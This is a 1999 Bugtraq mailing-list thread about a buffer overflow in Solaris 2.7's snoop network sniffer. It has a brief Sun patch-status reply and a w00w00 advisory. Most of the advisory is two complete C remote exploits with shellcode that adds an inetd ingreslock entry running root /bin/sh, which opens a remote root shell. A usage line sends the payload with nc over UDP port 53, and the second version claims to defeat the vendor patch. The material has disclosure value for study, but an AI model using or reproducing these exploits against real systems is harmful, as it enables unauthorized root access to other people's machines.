In case you don't know, both ISS and w00w00 have produced snoop advisories written recently; this is Chok Poh (of Sun Microsystems)'s response to Alfred Huger's request for clarification on what patches fix what. ---------- Forwarded message ---------- Date: Thu, 9 Dec 1999 14:57:10 -0800 From: Alfred Huger To: BUGTRAQ@SECURITYFOCUS.COM Subject: Clarification needed on the snoop vuln(s) (fwd) ---------- Forwarded message ---------- Date: Thu, 9 Dec 1999 14:53:56 -0800 (PST) From: Chok Poh To: ah@SECURITYFOCUS.COM Subject: Clarification needed on the snoop vuln(s) Alfred, The patches that Sun has released were in relation to the buffer overflow problem reported by ISS. We are producing patches for the problem posted by w00w00. Chok __________________________________________________________________________ Chok Poh Sun Security Coordination Team Sun Microsystems, Inc. email: security-alert@sun.com __________________________________________________________________________ Date: Tue, 7 Dec 1999 04:42:06 +0300 (MSK) From: Matt Conover To: news@technotronic.com cc: w00w00@blackops.org Subject: [w00giving #8] Solaris 2.7's snoop Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-news@technotronic.com Precedence: bulk [Note: as we promised, our website and technotronic will get this advisory before anything else does. Thanks for participating in technotronic.] w00w00 Security Development (WSD) http://www.w00w00.org/advisories.html Discovered by: K2 (ktwo@ktwo.ca) Snoop is a program similar to tcpdump that allows one to watch network traffic. There is a buffer overflow in the snoop program when run in verbose (-v) mode that occurs when a domain name greater than 1024 bytes is logged, because it will overwrite a buffer in print_domain_name. This vulnerability allows remote access to the system with the privileges of the user who ran snoop (usually root, because it requires read privileges on special devices). --------------------------------------------------------------------------- Exploit (by cheez): /* Remote Solaris 2.7 x86 snoop exploit Run with ( ./snp ) | nc -u target_host_network 53 requires target host to be running "snoop -v" Thanks str/horizon for shellcodes (hi plaguez) */ #include #include #include #include char shell[] = "\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89" "\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D" "\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89" "\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51" "\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF" "\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39" "\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73" "\x68\x28\x2D\x63\x29 echo w00w00;" "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >> /tmp/w00;" "/usr/sbin/inetd -s /tmp/w00; /bin/rm -f /tmp/w00"; #define SIZE 2048 #define NOPDEF 349 #define DEFOFF 0 char buffer[SIZE]; const char x86_nop=0x90; long nop=NOPDEF, esp=0x8047344, offset=DEFOFF; int main (int argc, char *argv[]) { int i; if (argc > 1) offset += strtol(argv[1], NULL, 0); if (argc > 2) nop += strtoul(argv[2], NULL, 0); memset(buffer, x86_nop, SIZE); memcpy(buffer+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < SIZE-4; i += 4) *((int *) &buffer[i]) = esp+offset; fprintf(stderr,"0x%x\n", esp+offset); printf("%s", buffer); return 0; } --------------------------------------------------------------------------- Patch: Because Sun Microsystems doesn't include source, we must wait for them to release a patch. --------------------------------------------------------------------------- http://www.roses-labs.com, http://www.napster.com, http://www.technotronic.com, http://www.w00w00.org -----Original Message----- From: Matt Conover To: news@technotronic.com Subject: Re: w00giving #8] Solaris 2.7's snoop w00w00 Security Development (WSD) http://www.w00w00.org/advisories.html Discovered by: K2 (ktwo@ktwo.ca) Hi, Here's a new version of my snoop exploit, it seems that it will work on the new patched version of snoop aswell, and actually, the target host dose NOT have to be running with -v. Some interesting applications would be to spoof the source and have it issue a remote command other then loading a portshell. K2 w00w00 /* by: K2, version .2 this is a funny Solaris. remote Solaris 2.7 x86 snoop exploit rm /tmp/w0 yourself!&@$*(&$!*(@*$&()%RW run with ( ./snp ) | nc -u target_host_network 53 requires target host to be running "snoop" verified with patch 108483-01 thx str/horizon for shellcodes. Hi plageuz Hi mom. */ #include #include #include #include char shell[] = "\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89" "\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D" "\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89" "\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51" "\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF" "\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39" "\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73" "\x68\x28\x2D\x63\x29 echo w00w00;echo \"ingreslock" "stream tcp nowait root /bin/sh sh -i\" >>/tmp/w0;" "/usr/sbin/inetd -s /tmp/w0;/bin/rm -f /tmp/w0"; #define SIZE 2048 #define NOPDEF 349 #define DEFOFF 0 const char x86_nop=0x90; long nop=NOPDEF,esp=0x804646c; long offset=DEFOFF; char buffer[SIZE]; int main (int argc, char *argv[]) { int i; if (argc > 1) offset += strtol(argv[1], NULL, 0); if (argc > 2) nop += strtoul(argv[2], NULL, 0); memset(buffer, x86_nop, SIZE); memcpy(buffer+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < SIZE-4; i += 4) { *((int *) &buffer[i]) = esp+offset; } fprintf(stderr,"0x%x\n",esp+offset); printf("%s", buffer); return 0; }